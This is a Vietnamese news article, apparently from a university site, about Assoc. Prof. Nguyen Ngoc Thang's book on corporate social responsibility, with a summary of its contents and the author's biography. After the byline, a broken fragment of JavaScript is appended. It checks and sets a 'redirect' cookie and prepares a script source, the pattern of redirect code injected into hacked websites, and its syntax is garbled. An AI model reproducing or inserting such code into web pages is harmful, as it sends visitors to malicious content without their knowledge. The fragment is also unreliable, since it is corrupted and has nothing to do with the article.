Cuốn sách “Trách nhiệm xã hội của doanh nghiệp” của PGS.TS Nguyễn Ngọc Thắng – Phó Chủ nhiệm Khoa Quản trị và Kinh doanh (HSB) là kết quả nghiên cứu chuyên sâu của tác giả về chủ đề Trách nhiệm xã hội nhằm giúp doanh nghiệp, cơ quan quản lý và các đơn vị liên quan có được tài liệu tham khảo hữu ích về trách nhiệm xã hội của doanh nghiệp.
Trách nhiệm xã hội của doanh nghiệp đang là vấn đề nóng bỏng của mọi quốc gia trên thế giới, đặc biệt ở các quốc gia đang phát triển. Việt Nam cũng đang phải đối mặt với các vấn đề như khai thác cạn kiệt tài nguyên, hủy hoại môi trường, điều kiện làm việc không an toàn, kinh doanh thiếu trung thực, hay người tiêu dùng chưa được bảo vệ quyền lợi chính đáng… Vậy đâu là nguyên do dẫn đến những tình trạng kể trên?
Câu hỏi như một hồi chuông cảnh báo chúng ta trong việc thực hiện trách nhiệm xã hội. Việc chúng ta khai thác và sử dụng các nguồn tài nguyên trong tự nhiên để tạo ra các sản phẩm và dịch vụ phục vụ cho nhu cầu của con người là hoàn toàn chính đáng. Tuy nhiên, chúng ta cần phải dung hòa giữa các hoạt động của doanh nghiệp và các mong đợi của xã hội. Thực tế nghiên cứu cho thấy các quốc gia trên thế giới – bất kể là quốc gia phát triển hay quốc gia đang phát triển – đều đang rất quan tâm đến mối quan hệ này.
Trước hoàn cảnh đó, với kinh nghiệm hơn 10 năm nghiên cứu, tư vấn và giảng dạy về quản trị chiến lược và trách nhiệm xã hội của doanh nghiệp, PGS.TS Nguyễn Ngọc Thắng – Phó Chủ nhiệm Khoa Quản trị và Kinh doanh (HSB) – ĐH Quốc Gia Hà Nội đã xuất bản cuốn sách có tựa đề: “Trách nhiệm xã hội của doanh nghiệp”.
Mục tiêu của cuốn sách là cung cấp kết quả nghiên cứu chuyên sâu của tác giả về chủ đề Trách nhiệm xã hội nhằm giúp doanh nghiệp, cơ quan quản lý và các đơn vị liên quan có được tài liệu tham khảo hữu ích về trách nhiệm xã hội của doanh nghiệp. Kết quả của nghiên cứu cũng là cơ sở cho các nghiên cứu chuyên sâu tiếp theo và cho việc xây dựng bài giảng về chủ đề này tại các trường đại học tại Việt Nam.
Cuốn sách gồm 3 phần, 8 chương với ý tưởng chủ đạo và xuyên suốt là vận dụng khoa học quản trị liên ngành vào việc thực thi trách nhiệm xã hội của doanh nghiệp. Trong đó, phần đầu tập trung vào việc làm sáng tỏ nội hàm và sự phát triển trách nhiệm xã hội của doanh nghiệp, phần II sẽ phân tích và đánh giá việc thực hiện trách nhiệm xã hội của doanh nghiệp tại các quốc gia và doanh nghiệp trên thế giới, trong khi phần III tập trung vào trình bày việc thực hiện trách nhiệm xã hội của doanh nghiệp tại Việt Nam. Cuốn sách cũng cung cấp các tình huống điển hình về thực hiện trách nhiệm xã hội của doanh nghiệp trên thế giới và tại Việt Nam.
Cuốn sách do NXB Đại học Quốc gia Hà Nội phát hành và tái bản lần thứ 2.
Với tư cách là chuyên gia nghiên cứu trong lĩnh vực Trách nhiệm xã hội, PGS.TS Nguyễn Ngọc Thắng đã có những trao đổi về vấn đề này trong Chương trình ‘Doanh nghiệp với trách nhiệm xã hội’, phát sóng số đầu tiên và 16h10 Chủ nhật ngày 7/1/2018 và phát lại vào 8h45 thứ 4 tuần kế tiếp trên VTV1.
Trước đó, PGS.TS Nguyễn Ngọc Thắng cũng là tác giả và đồng tác giả của nhiều sách chuyên khảo trong lĩnh vực Quản trị chiến lược, Quản trị nhân sự, tiêu biểu là cuốn sách “Tái cấu trúc ngân hàng thương mại theo chuẩn mực Basel II”.
PGS.TS. Nguyễn Ngọc Thắng (đồng tác giả) hiện là Phó Chủ nhiệm Khoa Quản trị và Kinh doanh (HSB) – ĐHQG HN. Ông tốt nghiệp Thạc sĩ Quản trị Kinh doanh tại Đại học Nam California, Hoa Kỳ và Tiến sĩ Khoa học Kinh tế ứng dụng tại Đại học Gent, Vương quốc Bỉ. Ông đã có 8 năm làm việc tại châu Âu với vai trò chuyên gia về phát triển tổ chức và nhân sự tại Ủy ban châu Âu và Công ty Kiểm toán Pricewaterhouse Coopers Belgium.
Các lĩnh vực nghiên cứu và giảng dạy chính của ông là quản trị chiến lược, ra quyết định quản trị, trách nhiệm xã hội của doanh nghiệp. Ông đã công bố nhiều công trình nghiên cứu trên các tạp chí khoa học quốc tế uy tín thuộc danh mục ISI/SCOPUS. Ngoài ra, ông từng làm chuyên gia tư vấn cho các dự án liên quan đến phát triển tổ chức và nhân sự, quản trị dự trên tri thức của UNDP, USAID, BTC và JICA tại Việt Nam.
Thùy Dung
{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}